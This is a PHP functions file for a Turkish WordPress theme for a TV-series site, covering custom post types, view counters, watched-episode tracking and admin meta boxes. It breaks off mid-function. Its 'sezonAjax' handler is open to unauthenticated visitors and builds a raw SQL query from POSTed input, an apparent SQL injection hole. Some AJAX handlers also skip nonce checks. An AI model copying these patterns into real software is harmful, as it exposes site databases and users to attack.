﻿<?php 
#################################################################################
## GENEL AYARLAR ##
#################################################################################
// Tema Paneli
add_action( 'admin_menu', 'register_my_custom_menu_page' );
function register_my_custom_menu_page() {
  // add_menu_page( $page_title, $menu_title, $capability, $menu_slug, $function, $icon_url, $position );
  add_menu_page( 'Hyper Solutions', 'Hyper Solutions', 'manage_options', 'hyperbot', '_run', 'dashicons-shield-alt', 5 );
}
function _run(){
	include get_template_directory()."/hypers/bot.php";
}
	if ( STYLESHEETPATH == TEMPLATEPATH ) {
	define('OF_FILEPATH', TEMPLATEPATH);
	define('OF_DIRECTORY', get_bloginfo('template_directory'));
	} else {
	define('OF_FILEPATH', STYLESHEETPATH);
	define('OF_DIRECTORY', get_bloginfo('stylesheet_directory'));
	}
	require_once (OF_FILEPATH . '/admin/admin-functions.php');
	require_once (OF_FILEPATH . '/admin/admin-interface.php');
	require_once (OF_FILEPATH . '/admin/theme-options.php');
	require_once (OF_FILEPATH . '/admin/theme-functions.php');


	
//Navigasyon Menü Desteği
	add_action( 'init', 'theme_menus' );
		function theme_menus(){
			register_nav_menus(
				array(
					'header-nav' => __( 'Header Menü' ),
					'footer-nav' => __( 'Footer Menü' )
				)
			);
			
		};
		
//Öne Çıkarılan Görsel Desteği
	add_theme_support('post-thumbnails');	

//Arka Plan Desteği	
	$defaultsBackground = array(
		'default-color'          => '000',
		'default-image' 		 => '',
		'default-repeat'         => '',
		'default-position-x'     => '',
		'default-attachment'     => 'fixed',
		'wp-head-callback'       => '_custom_background_cb',
		'admin-head-callback'    => '',
		'admin-preview-callback' => ''
	);
	add_theme_support('custom-background', $defaultsBackground);

//Widget Desteği  -- Şuan İçin Tanımsız Durumda
	if ( function_exists( 'register_sidebar' ) )
		register_sidebar(array(
			'name' => 'Bileşen',
			'before_widget' => '',
			'after_widget' => '',
			'before_title' => '',
			'after_title' => '',
		));

// Resimlere Otomatik Title & Alt Etiketi
	function resim_title_alt_ekle($content) {
	global $post;
		$baslik = get_the_title($post->ID);
		$ara = '/<img(.*?)src="(.*?).(bmp|gif|jpeg|jpg|png)"(.*?)>/i';
		$degistir = '<img$1src="$2.$3" title="'.$baslik.'" alt="'.$baslik.'" $4>';
		$content = preg_replace( $ara, $degistir, $content );
		return $content;
	}
	add_filter( 'the_content', 'resim_title_alt_ekle' );		

// Türkçe Karakter UCWORDS Desteği
	function ucwords_tr($gelen){
	  $sonuc = '';
	  $kelimeler = explode(" ", $gelen);
	  foreach($kelimeler as $kelime_duz){
		$kelime_uzunluk = strlen($kelime_duz);
		$ilk_karakter = mb_substr($kelime_duz,0,1,'UTF-8');
		
		if($ilk_karakter == 'Ç' or $ilk_karakter == 'ç'){
		  $ilk_karakter='Ç';
		}elseif($ilk_karakter == 'Ğ' or $ilk_karakter == 'ğ'){
		  $ilk_karakter='Ğ';
		}elseif($ilk_karakter == 'I' or $ilk_karakter == 'ı'){
		  $ilk_karakter='I';
		}elseif($ilk_karakter == 'İ' or $ilk_karakter == 'i'){
		  $ilk_karakter='İ';
		}elseif($ilk_karakter == 'Ö' or $ilk_karakter == 'ö'){
		  $ilk_karakter='Ö';
		}elseif($ilk_karakter == 'Ş' or $ilk_karakter == 'ş'){
		  $ilk_karakter='Ş';
		}elseif($ilk_karakter == 'Ü' or $ilk_karakter == 'ü'){
		  $ilk_karakter='Ü';
		}else{
		  $ilk_karakter = strtoupper($ilk_karakter);
		}
		$digerleri = mb_substr($kelime_duz,1,$kelime_uzunluk,'UTF-8');
		$sonuc.= $ilk_karakter.kucuk_yap($digerleri).' ';
	  }
	  $son = trim(str_replace('  ', ' ', $sonuc));
	  return $son;
	}			
	function kucuk_yap($gelen){
	 
	  $gelen = str_replace('Ç', 'ç', $gelen);
	  $gelen = str_replace('Ğ', 'ğ', $gelen);
	  $gelen = str_replace('I', 'ı', $gelen);
	  $gelen = str_replace('İ', 'i', $gelen);
	  $gelen = str_replace('Ö', 'ö', $gelen);
	  $gelen = str_replace('Ş', 'ş', $gelen);
	  $gelen = str_replace('Ü', 'ü', $gelen);
	  $gelen = strtolower($gelen);

	  return $gelen;
	}	

// Metin Editörüne Buton Ekleme & Player Tercihi Shortcode Desteği	
	if(!function_exists('partButon')){
		function partButon(){ 
			?>
				<script type="text/javascript">
					QTags.addButton('partekle','Part Ekle','<?php echo "<!--nextpage--><!--baslik: Başlık Buraya Gelecek -->"; ?>','','','İframe kodunuzu kısa kod\'dan sonra yazın.');
				</script>
			<?php
		}
		add_action('admin_print_footer_scripts', 'partButon');
	}
	if(!function_exists('baslikButon')){
		function baslikButon(){ 
			?>
				<script type="text/javascript">
					QTags.addButton('baslikekle','Başlık Ekle','<?php echo "<!--baslik: Başlık Buraya Gelecek -->"; ?>','','','İframe kodunuzu kısa kod\'dan sonra yazın.');
				</script>
			<?php
		}
		add_action('admin_print_footer_scripts', 'baslikButon');
	}

// Alternatif Part Sistemi
	function wp_link_pages_titled( $args = "" ){
		$defaults = array(
			"before" => "<p>".__( "Pages:" ),
			"after" => "</p>",
			"link_before" => "",
			"link_after" => "",
			"next_or_number" => "number",
			"pagelink" => "%",
			"echo" => true
		);
		$r = wp_parse_args( $args, $defaults );
		extract( $r, EXTR_SKIP );
		global $page;
		global $numpages;
		global $multipage;
		global $more;
		global $pagenow;
		global $pages;
		$output = "";
		if ($multipage){
			echo "";
			$output .= $before;
			$i = 1;
			while ($i < $numpages + 1){
				$part_content = $pages[$i - 1];
				$has_part_title = strpos($part_content, "<!--baslik:");
					if (0 === $has_part_title){
						$end = strpos($part_content, "-->");
						$title = trim(str_replace("<!--baslik:", "", substr($part_content, 0, $end )));
					}
					else{
						$title = $i.".&nbsp;Part";
					}
				$output .= "<li>";
					if ($i != $page || !$more && $page == 1){
						$output .= _wp_link_page( $i );
					}
				$title = isset( $title ) && 0 < strlen($title) ? $title : ". Part";
				$output .= $title;
					if ( $i != $page || !$more && $page == 1 ){
						$output .= "</a>";
					}
				$output .= "</li>";
				$i = $i + 1;
			}
			$output .= $after;
		}
		if ($echo){
			echo $output;
		}
		return $output;
	}	
	
#################################################################################
## İÇERİK ALANLARI ##	
#################################################################################
// Diziler 
	function dizilerPostType(){
	  $labels = array(
		'singular_name'      => _x( 'Diziler', 'diziler' ),
		'name'               => _x( 'Diziler', 'diziler' ),
		'add_new'            => _x( 'Yeni Dizi Ekle', 'diziler' ),
		'add_new_item'       => __( 'Yeni Dizi Ekle' ),
		'edit_item'          => __( 'Diziyi Düzenle' ),
		'new_item'           => __( 'Yeni Dizi Ekle' ),
		'all_items'          => __( 'Diziler' ),
		'view_item'          => __( 'Diziyi Görüntüle' ),
		'search_items'       => __( 'Dizi Ara' ),
		'not_found'          => __( 'Dizi Yok' ),
		'not_found_in_trash' => __( 'Dizi bulunmuyor.' ), 
		'parent_item_colon'  => '',
		'menu_name'          => 'Diziler'
	  );
	  $args = array(
		'labels'        => $labels,
		'public'        => true,
		'menu_position' => 5,
		'rewrite' => true,
		'supports'      => array('title', 'editor', 'thumbnail','comments'),
        'taxonomies' 	=> array('category')
	  );
	  register_post_type('diziler', $args); 
	  flush_rewrite_rules();
	}
	add_action('init','dizilerPostType');
	
// Haberler 
	if(get_option("diziPremium_haberler") == "true"){
		function haberlerPostType(){
		  $labels = array(
			'singular_name'      => _x( 'Haberler', 'haberler' ),
			'name'               => _x( 'Haberler', 'haberler' ),
			'add_new'            => _x( 'Yeni Haber Ekle', 'haberler' ),
			'add_new_item'       => __( 'Yeni Haber Ekle' ),
			'edit_item'          => __( 'Haberi Düzenle' ),
			'new_item'           => __( 'Yeni Haber Ekle' ),
			'all_items'          => __( 'Haberler' ),
			'view_item'          => __( 'Haberi Görüntüle' ),
			'search_items'       => __( 'Haber Ara' ),
			'not_found'          => __( 'Haber Yok' ),
			'not_found_in_trash' => __( 'Haber bulunmuyor.' ), 
			'parent_item_colon'  => '',
			'menu_name'          => 'Haberler'
		  );
		  $args = array(
			'labels'        => $labels,
			'public'        => true,
			'menu_position' => 5,
			'rewrite' => true,
			'supports'      => array('title', 'editor', 'thumbnail','comments')
		  );
		  register_post_type('haberler', $args); 
		  flush_rewrite_rules();
		}
		add_action('init','haberlerPostType');
	}	
// S.S.S 
	if(get_option("diziPremium_sss") == "true"){
		function yardimPostType(){
		  $labels = array(
			'singular_name'      => _x( 'Sıkça Sorulan Sorular', 'yardim' ),
			'name'               => _x( 'Sıkça Sorulan Sorular', 'yardim' ),
			'add_new'            => _x( 'Yeni S.S.S Ekle', 'yardim' ),
			'add_new_item'       => __( 'Yeni Sıkça Sorulan Soru Ekle' ),
			'edit_item'          => __( 'Sıkça Sorulan Soruyu Düzenle' ),
			'new_item'           => __( 'Yeni S.S.S Ekle' ),
			'all_items'          => __( 'S.S.S' ),
			'view_item'          => __( 'Soruyu Görüntüle' ),
			'search_items'       => __( 'Sıkça Sorulan Soru Ara' ),
			'not_found'          => __( 'Sıkça Sorulan Soru Yok' ),
			'not_found_in_trash' => __( 'Sıkça Sorulan Soru bulunmuyor.' ), 
			'parent_item_colon'  => '',
			'menu_name'          => 'S.S.S'
		  );
		  $args = array(
			'labels'        => $labels,
			'public'        => true,
			'menu_position' => 5,
			'rewrite' => true,
			'supports'      => array('title', 'editor')
		  );
		  register_post_type('yardim', $args); 
		  flush_rewrite_rules();
		}
		add_action('init','yardimPostType');
	}
#################################################################################
## İÇERİK ALANLARININ AYARLARI ##
#################################################################################	
	function removeSupports(){
		remove_post_type_support('post','excerpt');
		remove_post_type_support('post','trackbacks');
		remove_post_type_support('post','custom-fields');
		remove_post_type_support('post','author');
		remove_post_type_support('post','revisions');
		remove_post_type_support('post','post_slug');
	}
	function removeTagsSupport() {
		unregister_taxonomy_for_object_type('post_tag', 'post');
		unregister_taxonomy_for_object_type('category', 'post');
	} 
	function removeSlugDiv() {
	  remove_meta_box('slugdiv', 'post', 'normal');
	  remove_meta_box('slugdiv', 'diziler', 'normal');
	  remove_meta_box('slugdiv', 'haberler', 'normal');
	  remove_meta_box('slugdiv', 'yardim', 'normal');
	}
	add_action('init','removeSupports');
	add_action('init','removeTagsSupport');		
	add_action('admin_menu','removeSlugDiv');	

// Wordpress İçerik Güncelleme Mesajı	
	function my_post_update_message($postMessages){
		$postMessages['post'][1] = sprintf( __('Bölüm güncellendi. <a href="%s">Bölümü görüntüle.</a>'),esc_url(get_permalink($post_ID)));
		$postMessages['post'][6] = sprintf( __('Bölüm yayınlandı. <a href="%s">Bölümü görüntüle.</a>'),esc_url(get_permalink($post_ID)));
		$postMessages['diziler'][6] = sprintf( __('Dizi yayınlandı. <a href="%s">Diziyi görüntüle.</a>'),esc_url(get_permalink($post_ID)));
		$postMessages['diziler'][1] = sprintf( __('Dizi güncellendi. <a href="%s">Diziyi görüntüle.</a>'),esc_url(get_permalink($post_ID)));
		$postMessages['haberler'][6] = sprintf( __('Haber yayınlandı. <a href="%s">Haberi görüntüle.</a>'),esc_url(get_permalink($post_ID)));
		$postMessages['haberler'][1] = sprintf( __('Haber güncellendi. <a href="%s">Haberi görüntüle.</a>'),esc_url(get_permalink($post_ID)));
		$postMessages['yardim'][6] = sprintf( __('S.S.S yayınlandı. <a href="%s">Sıkça sorulan soruyu görüntüle.</a>'),esc_url(get_permalink($post_ID)));
		$postMessages['yardim'][1] = sprintf( __('S.S.S güncellendi. <a href="%s">Sıkça sorulan soruyu görüntüle.</a>'),esc_url(get_permalink($post_ID)));
		return $postMessages;
	}
	add_filter('post_updated_messages','my_post_update_message');	

#################################################################################
## İzlenme & Görüntülenme ve Okunma Değerlerinin Oluşturulması	##
#################################################################################
// İzlenen Bölümler	
	function premiumViews(){ 
		global $post;
		$uyeID 		 = get_current_user_id();
		
		$eskiIzlenme = get_post_meta ($post->ID,"izlenme",true);
		$yeniIzlenme = $eskiIzlenme+1;
			if($eskiIzlenme){
				update_post_meta($post->ID,"izlenme",$yeniIzlenme);
			}else{
				add_post_meta($post->ID,"izlenme",1);
			}
			
		if(!empty($uyeID)){ 
			$bolumAdi 			 = get_the_title();
			$bolumID             = get_the_ID();
				$smash 			 = explode(":",$bolumAdi);
				$smashTwo 		 = explode(" ",$smash[1]);
			$diziAdi 			 = $smash[0];
			$sezon 			 	 = $smashTwo[1];
			$bolum 			 	 = $smashTwo[2];
			$adFinal			 = $diziAdi." : ".$sezon." ".$bolum." ".$bolumID;
			
			$eskiIzlenenBolumler   = get_user_meta($uyeID,"izlenenBolumler",true);
			$izlenenBolumler  	   = array();
			array_push($izlenenBolumler,$eskiIzlenenBolumler);
			array_push($izlenenBolumler,$adFinal);
			$izlenenBolumler       = array_map('trim',$izlenenBolumler);
			$izlenenBolumler 	   = array_unique($izlenenBolumler);

			$arraySeparator   = ", ";
			$arrayReal		   = "";
			foreach($izlenenBolumler as $izlenenBolum){
				  $arrayReal .= $izlenenBolum.$arraySeparator;
			}
			$arrayRealEnd = trim($arrayReal,$arraySeparator);
			
			if(get_user_meta($uyeID,"izlenenBolumler")){
				update_user_meta($uyeID,"izlenenBolumler",$arrayRealEnd);	
			}else{
				add_user_meta($uyeID,"izlenenBolumler",$arrayRealEnd,true);	
			}
		}
	}	

// İzlenme Change
	function izlenmeChange(){
		$iClass			= intval(@$_POST["iClass"]);
		$bolumAd		= htmlspecialchars(@$_POST["bolumAd"]);
		$bolumID		= htmlspecialchars(@$_POST["bolumID"]);
		$kullaniciID 	= get_current_user_id();
		if(!empty($kullaniciID)){
			if($iClass == 0){ 
					$smash 			 = explode(":",$bolumAd);
					$smashTwo 		 = explode(" ",$smash[1]);
				$diziAdi 			 = $smash[0];
				$sezon 			 	 = $smashTwo[1];
				$bolum 			 	 = $smashTwo[2];
				$adFinal			 = $diziAdi." : ".$sezon." ".$bolum." ".$bolumID;

				$eskiIzlenenBolumler   = get_user_meta($kullaniciID,"izlenenBolumler",true);
				
				$izlenenBolumler  	   = explode(",",$eskiIzlenenBolumler);
				$izlenenBolumler       = array_map('trim',$izlenenBolumler);
				$izlenenBolumler 	   = array_unique($izlenenBolumler);
				
				$yeniArray 		   	   = array_keys($izlenenBolumler, $adFinal); 
				unset($izlenenBolumler[$yeniArray[0]]);
				
				$arraySeparator   = ", ";
				$arrayReal		   = "";
				foreach($izlenenBolumler as $izlenenBolum){
					  $arrayReal .= $izlenenBolum.$arraySeparator;
				}
				$arrayRealEnd = trim($arrayReal,$arraySeparator);
					if($arrayRealEnd == ""){
						if(get_user_meta($kullaniciID,"izlenenBolumler")){
							update_user_meta($kullaniciID,"izlenenBolumler"," ");	
						}else{
							add_user_meta($kullaniciID,"izlenenBolumler"," ",true);			
						}
					}else{
						if(get_user_meta($kullaniciID,"izlenenBolumler")){
							update_user_meta($kullaniciID,"izlenenBolumler",$arrayRealEnd);	
						}else{
							add_user_meta($kullaniciID,"izlenenBolumler",$arrayRealEnd,true);			
						}
					}
			}else{ 
					$smash 			 = explode(":",$bolumAd);
					$smashTwo 		 = explode(" ",$smash[1]);
				$diziAdi 			 = $smash[0];
				$sezon 			 	 = $smashTwo[1];
				$bolum 			 	 = $smashTwo[2];
				$adFinal			 = $diziAdi." : ".$sezon." ".$bolum." ".$bolumID;

				$eskiIzlenenBolumler   = get_user_meta($kullaniciID,"izlenenBolumler",true);
				$izlenenBolumler  	   = array();
				array_push($izlenenBolumler,$eskiIzlenenBolumler);
				array_push($izlenenBolumler,$adFinal);
				$izlenenBolumler       = array_map('trim',$izlenenBolumler);
				$izlenenBolumler 	   = array_unique($izlenenBolumler);

				$arraySeparator   = ", ";
				$arrayReal		   = "";
				foreach($izlenenBolumler as $izlenenBolum){
					  $arrayReal .= $izlenenBolum.$arraySeparator;
				}
				$arrayRealEnd = trim($arrayReal,$arraySeparator);
				
				if(get_user_meta($kullaniciID,"izlenenBolumler")){
					update_user_meta($kullaniciID,"izlenenBolumler",$arrayRealEnd);	
				}else{
					add_user_meta($kullaniciID,"izlenenBolumler",$arrayRealEnd,true);			
				}
			}
		}else{ 
			echo "hata"; 
		}
		wp_die();
	}
	add_action('wp_ajax_izlenmeChange', 'izlenmeChange');
	add_action('wp_ajax_nopriv_izlenmeChange', 'izlenmeChange');
	
// Görüntülenen Diziler	
	function premiumViewsDiziPages(){ 
		global $post;
		$uyeID 		 = get_current_user_id();
		
		$eskiDiziIzlenme = get_post_meta ($post->ID,"diziIzlenme",true);
		$yeniDiziIzlenme = $eskiDiziIzlenme+1;
			if($eskiDiziIzlenme){
				update_post_meta($post->ID,"diziIzlenme",$yeniDiziIzlenme);
			}else{
				add_post_meta($post->ID,"diziIzlenme",1);
			}
	}		

// Okunan Haberler	
	function premiumViewsHaberPages(){ 
		global $post;

		$eskiHaberIzlenme = get_post_meta ($post->ID,"haberIzlenme",true);
		$yeniHaberIzlenme = $eskiHaberIzlenme+1;
			if($eskiHaberIzlenme){
				update_post_meta($post->ID,"haberIzlenme",$yeniHaberIzlenme);
			}else{
				add_post_meta($post->ID,"haberIzlenme",1);
			}
	}		

#################################################################################
## İzlenme & Görüntülenme ve Okunmanın İçerik Alanı Panelinde Gösterilmesi ##
#################################################################################	
// Bölümler İzlenme Panel Sortable 
	function izlenme_column_register( $columns ) {
		$columns['izlenme'] = __( 'İzlenme', 'my-plugin' );

		return $columns;
	}
	function izlenme_column_display( $column_name, $post_id ) {
		if ( 'izlenme' != $column_name )
			return;
		$izlenme = get_post_meta($post_id, 'izlenme', true);
		if ( !$izlenme )
			$izlenme = __( '0', 'my-plugin' );
		echo $izlenme;
	}
	function izlenme_column_register_sortable( $columns ) {
		$columns['izlenme'] = 'izlenme';
		return $columns;
	}
	function izlenme_column_orderby( $vars ) {
		if ( isset( $vars['orderby'] ) && 'izlenme' == $vars['orderby'] ) {
			$vars = array_merge( $vars, array(
				'meta_key' => 'izlenme',
				'orderby' => 'meta_value_num'
			) );
		}
		return $vars;
	}

	add_action( 'manage_posts_custom_column', 'izlenme_column_display', 10, 2 );
	add_filter( 'manage_edit-post_columns', 'izlenme_column_register' );
	add_filter( 'manage_edit-post_sortable_columns', 'izlenme_column_register_sortable' );
	add_filter( 'request', 'izlenme_column_orderby' );

// Diziler Görüntülenme Panel Sortable 
	function diziIzlenme_column_register( $columns ) {
		$columns['diziIzlenme'] = __( 'Görüntülenme', 'my-plugin' );

		return $columns;
	}
	function diziIzlenme_column_display( $column_name, $post_id ) {
		if ( 'diziIzlenme' != $column_name )
			return;
		$diziIzlenme = get_post_meta($post_id, 'diziIzlenme', true);
		if ( !$diziIzlenme )
			$diziIzlenme = __( '0', 'my-plugin' );
		echo $diziIzlenme;
	}
	function diziIzlenme_column_register_sortable( $columns ) {
		$columns['diziIzlenme'] = 'diziIzlenme';
		return $columns;
	}
	function diziIzlenme_column_orderby( $vars ) {
		if ( isset( $vars['orderby'] ) && 'diziIzlenme' == $vars['orderby'] ) {
			$vars = array_merge( $vars, array(
				'meta_key' => 'diziIzlenme',
				'orderby' => 'meta_value_num'
			) );
		}
		return $vars;
	}

	add_action( 'manage_posts_custom_column', 'diziIzlenme_column_display', 10, 2 );
	add_filter( 'manage_edit-diziler_columns', 'diziIzlenme_column_register' );
	add_filter( 'manage_edit-diziler_sortable_columns', 'diziIzlenme_column_register_sortable' );
	add_filter( 'request', 'diziIzlenme_column_orderby' );	
	
// Haberler Okunma Panel Sortable 
	function haberler_column_register( $columns ) {
		$columns['haberIzlenme'] = __( 'Okunma', 'my-plugin' );

		return $columns;
	}
	function haberler_column_display( $column_name, $post_id ) {
		if ( 'haberIzlenme' != $column_name )
			return;
		$haberIzlenme = get_post_meta($post_id, 'haberIzlenme', true);
		if ( !$haberIzlenme )
			$haberIzlenme = __( '0', 'my-plugin' );
		echo $haberIzlenme;
	}
	function haberler_column_register_sortable( $columns ) {
		$columns['haberIzlenme'] = 'haberIzlenme';
		return $columns;
	}
	function haberler_column_orderby( $vars ) {
		if ( isset( $vars['orderby'] ) && 'haberIzlenme' == $vars['orderby'] ) {
			$vars = array_merge( $vars, array(
				'meta_key' => 'haberIzlenme',
				'orderby' => 'meta_value_num'
			) );
		}
		return $vars;
	}

	add_action( 'manage_posts_custom_column', 'haberler_column_display', 10, 2 );
	add_filter( 'manage_edit-haberler_columns', 'haberler_column_register' );
	add_filter( 'manage_edit-haberler_sortable_columns', 'haberler_column_register_sortable' );
	add_filter( 'request', 'haberler_column_orderby' );	
	
#################################################################################
## BÖLÜMLER İÇERİK ALANININ META & POST KUTULARI ##
#################################################################################	
// Bölüm Adı
	function bolumAdi(){
		add_meta_box("bolumad", "Bölüm Adı", "bolumAdiBody", "post", "side", "high", null);
	}
	function bolumAdiBody($object){
		wp_nonce_field(basename(__FILE__), "meta-box-nonce");
		?>
			<p>
				<input name="bolumad" type="text" style="box-sizing: border-box; width: 100%;" value="<?php echo get_post_meta($object->ID, "bolumad", true); ?>">
			</p>
		<?php  
	}
	function bolumAdiSave($post_id, $post, $update){
		if (!isset($_POST["meta-box-nonce"]) || !wp_verify_nonce($_POST["meta-box-nonce"], basename(__FILE__)))
			return $post_id;

		if(!current_user_can("edit_post", $post_id))
			return $post_id;

		if(defined("DOING_AUTOSAVE") && DOING_AUTOSAVE)
			return $post_id;

		$slug = "post";
		if($slug != $post->post_type)
			return $post_id;

		$bolAdiValue = "";

		if(isset($_POST["bolumad"]))
		{
			$bolAdiValue = htmlspecialchars($_POST["bolumad"]);
		}   
		update_post_meta($post_id, "bolumad", $bolAdiValue);
	}
	add_action("add_meta_boxes", "bolumAdi");
	add_action("save_post", "bolumAdiSave",11,3);
	
// Bolum Acıklaması
	function bolumAciklama(){
		add_meta_box("bolacikla", "Bölüm Açıklaması", "bolumAciklamaBody", "post", "normal", "low", null);
	}
	function bolumAciklamaBody($object){
		wp_nonce_field(basename(__FILE__), "meta-box-nonce");
		?>
			<p>
				<textarea name="bolacikla" type="text" rows="4" style="box-sizing: border-box; width: 100%;"><?php echo get_post_meta($object->ID, "bolacikla", true); ?></textarea>
			</p>
		<?php  
	}
	function bolumAciklamaSave($post_id, $post, $update){
		if (!isset($_POST["meta-box-nonce"]) || !wp_verify_nonce($_POST["meta-box-nonce"], basename(__FILE__)))
			return $post_id;

		if(!current_user_can("edit_post", $post_id))
			return $post_id;

		if(defined("DOING_AUTOSAVE") && DOING_AUTOSAVE)
			return $post_id;

		$slug = "post";
		if($slug != $post->post_type)
			return $post_id;

		$bolumAciklamaValue = "";

		if(isset($_POST["bolacikla"]))
		{
			$bolumAciklamaValue = htmlspecialchars($_POST["bolacikla"]);
		}   
		update_post_meta($post_id, "bolacikla", $bolumAciklamaValue);
	}
	add_action("add_meta_boxes", "bolumAciklama");
	add_action("save_post", "bolumAciklamaSave",11,3);
	
// Bu Bölüm Hangi Diziye Ait
	function bolumDiziDropdown(){
		add_meta_box("bolumDiziDropdown", "Bu Bölüm Hangi Diziye Ait ?", "bolumDiziDropdownBody", "post", "side", "high", null);
	}
	function bolumDiziDropdownBody($object){
		wp_nonce_field(basename(__FILE__), "meta-box-nonce");
		?>
			<p>
				<select name="bolumDiziDropdown" style="box-sizing: border-box;width: 100%;">
					<?php 
						$titleSeperator  = ",";
						$titleOutput	 = "";
						$bolumDiziId 	 = "";
						query_posts(array("post_type" => "diziler","posts_per_page" => -1,"order" => "ASC","orderby" => "title"));
							if( have_posts() ) : while ( have_posts() ) : the_post();
								$titleOutput .= get_the_title().$titleSeperator;
								$bolumDiziId .= get_the_ID().$titleSeperator;
							endwhile; wp_reset_query(); endif; 
						$titles 	   = trim($titleOutput,$titleSeperator);
						$bdiOutput     = trim($bolumDiziId,$titleSeperator);
						$titlesExplode = explode(",",$titles);
						$bdiExplode    = explode(",",$bdiOutput);
						$texCount	   = count($titlesExplode);
						for($ti = 0; $ti <= $texCount; $ti++){
							$option_values = $titlesExplode;
							$bdi_values    = $bdiExplode;
						}
						$sayi = -1;
						foreach($option_values as $key => $value){
							$sayi++;
							if($value == get_post_meta($object->ID, "bolumDiziDropdown", true)){
								?>
									<option selected><?php echo $value; ?></option>
								<?php    
							}
							else{
								echo get_post_meta($object->ID, "bolumDiziDropdown", true);
								?>
									<option><?php echo $value; ?></option>
								<?php
							}
						}
					?>
				</select>
			</p>
		<?php  
	}
	function bolumDiziDropdownSave($post_id, $post, $update){
		if (!isset($_POST["meta-box-nonce"]) || !wp_verify_nonce($_POST["meta-box-nonce"], basename(__FILE__)))
			return $post_id;

		if(!current_user_can("edit_post", $post_id))
			return $post_id;

		if(defined("DOING_AUTOSAVE") && DOING_AUTOSAVE)
			return $post_id;

		$slug = "post";
		if($slug != $post->post_type)
			return $post_id;
		
		$bolumDiziDropdownValue = "";

		if(isset($_POST["bolumDiziDropdown"])){
			$bolumDiziDropdownValue = htmlspecialchars($_POST["bolumDiziDropdown"]);
		}   
		update_post_meta($post_id, "bolumDiziDropdown", $bolumDiziDropdownValue);
	}
	add_action("add_meta_boxes", "bolumDiziDropdown");
	add_action("save_post", "bolumDiziDropdownSave",11,3);
		
// Bu Bölüm Hangi Sezona Ait
	function sezonAjax(){
		$deger = @htmlspecialchars($_POST["diziName"]);
		global $wpdb;
			$mypostids = $wpdb->get_col("select ID from $wpdb->posts where post_title LIKE '".$deger."%' ");
			$args = array(
				'post__in'=> $mypostids,
				'post_type'=>'diziler',
				'orderby'=>'title'
			);
			$res = new WP_Query($args);
			while( $res->have_posts() ) : $res->the_post();
				global $post;
				$EstablishmentNumber = get_post_meta($post->ID,'EstablishmentNumber', true);
				$schl = array('id'=>$EstablishmentNumber, 'label'=>$post->post_title , 'value'=>$EstablishmentNumber );     
				$matchedSchools[] = $schl;
					echo get_post_meta($post->ID, "meta-box-dropdown", true);
			endwhile;
			wp_reset_postdata();
	}
	add_action('wp_ajax_sezonAjax', 'sezonAjax');
	add_action('wp_ajax_nopriv_sezonAjax', 'sezonAjax');

	function bolumSezonDropdown(){
		add_meta_box("bolumSezonDropdown", "Bu Bölüm Hangi Sezona Ait ?", "bolumSezonDropdownBody", "post", "side", "high", null);
	}
	function bolumSezonDropdownBody($object){
		wp_nonce_field(basename(__FILE__), "meta-box-nonce");
		?>
			<p class="sezonAjax">
			<script type="text/javascript">
				jQuery(function(){
					/* This Start */
					var valueSelected = jQuery("select[name=bolumDiziDropdown] option:selected").text();
					jQuery.ajax({
						type: "POST",
						url: "/wp-admin/admin-ajax.php",
						dataType: "text",
						data: ({ action: 'sezonAjax', diziName: valueSelected }),
						success: function(dataValue){
							var res = dataValue.replace("0", "");
							jQuery("select[name=bolumSezonDropdown]").empty();
							for(var i = 1; i <= res; i++){
								console.log(i);
								jQuery("select[name=bolumSezonDropdown]").append("<option>"+i+"</option>");
							}
						}
					});
					/* This Change */
					jQuery("select[name=bolumDiziDropdown]").on("change",function(){
						var optionSelected = jQuery("option:selected", this);
						var valueSelected  = this.value;
						jQuery.ajax({
							type: "POST",
							url: "/wp-admin/admin-ajax.php",
							dataType: "text",
							data: ({ action: 'sezonAjax', diziName: valueSelected }),
							success: function(dataValue){
								var res = dataValue.replace("0", "");
								jQuery("select[name=bolumSezonDropdown]").empty();
								for(var i = 1; i <= res; i++){
									console.log(i);
									jQuery("select[name=bolumSezonDropdown]").append("<option>"+i+"</option>");
								}
							}
						});
					});
				});
			</script>
			<script type="text/javascript" src="http://code.jquery.com/jquery-2.1.4.min.js"></script>
				<select name="bolumSezonDropdown" style="box-sizing: border-box;width: 100%;">
					<?php 
						$option_values = array(1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20);
						foreach($option_values as $key => $value){
							if($value == get_post_meta($object->ID, "bolumSezonDropdown", true)){
								?>
									<option selected><?php echo $value; ?></option>
								<?php    
							}
							else{
								?>
									<option><?php echo $value; echo $devam;?></option>
								<?php
							}
						}
					?>
				</select>
			</p>
		<?php  
	}
	function bolumSezonDropdownSave($post_id, $post, $update){
		if (!isset($_POST["meta-box-nonce"]) || !wp_verify_nonce($_POST["meta-box-nonce"], basename(__FILE__)))
			return $post_id;

		if(!current_user_can("edit_post", $post_id))
			return $post_id;

		if(defined("DOING_AUTOSAVE") && DOING_AUTOSAVE)
			return $post_id;

		$slug = "post";
		if($slug != $post->post_type)
			return $post_id;
		
		$bolumSezonDropdownValue = "";

		if(isset($_POST["bolumSezonDropdown"])){
			$bolumSezonDropdownValue = htmlspecialchars($_POST["bolumSezonDropdown"]);
		}   
		update_post_meta($post_id, "bolumSezonDropdown", $bolumSezonDropdownValue);
	}
	add_action("add_meta_boxes", "bolumSezonDropdown");
	add_action("save_post", "bolumSezonDropdownSave",11,3);
	
#################################################################################
## DİZİLER İÇERİK ALANININ META & POST KUTULARI ##
#################################################################################	
// Bu Dizi Kaç Sezon 
	function diziPremiumSelectBox(){
		add_meta_box("diziPremiumSelectBox", "Bu Dizi Kaç Sezon ?", "diziPremiumSelectBoxBody", "diziler", "side", "high", null);
	}
	function diziPremiumSelectBoxBody($object){
		wp_nonce_field(basename(__FILE__), "meta-box-nonce");
		?>
			<p>
				<select name="meta-box-dropdown" style="box-sizing: border-box;width: 100%;">
					<?php 
						$option_values = array(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20);
						foreach($option_values as $key => $value){
							if($value == get_post_meta($object->ID, "meta-box-dropdown", true)){
								?>
									<option selected><?php echo $value; ?></option>
								<?php    
							}
							else{
								?>
									<option><?php echo $value; ?></option>
								<?php
							}
						}
					?>
				</select>
			</p>
		<?php  
	}
	function diziPremiumSelectBoxSave($post_id, $post, $update){
		if (!isset($_POST["meta-box-nonce"]) || !wp_verify_nonce($_POST["meta-box-nonce"], basename(__FILE__)))
			return $post_id;

		if(!current_user_can("edit_post", $post_id))
			return $post_id;

		if(defined("DOING_AUTOSAVE") && DOING_AUTOSAVE)
			return $post_id;

		$slug = "diziler";
		if($slug != $post->post_type)
			return $post_id;
		
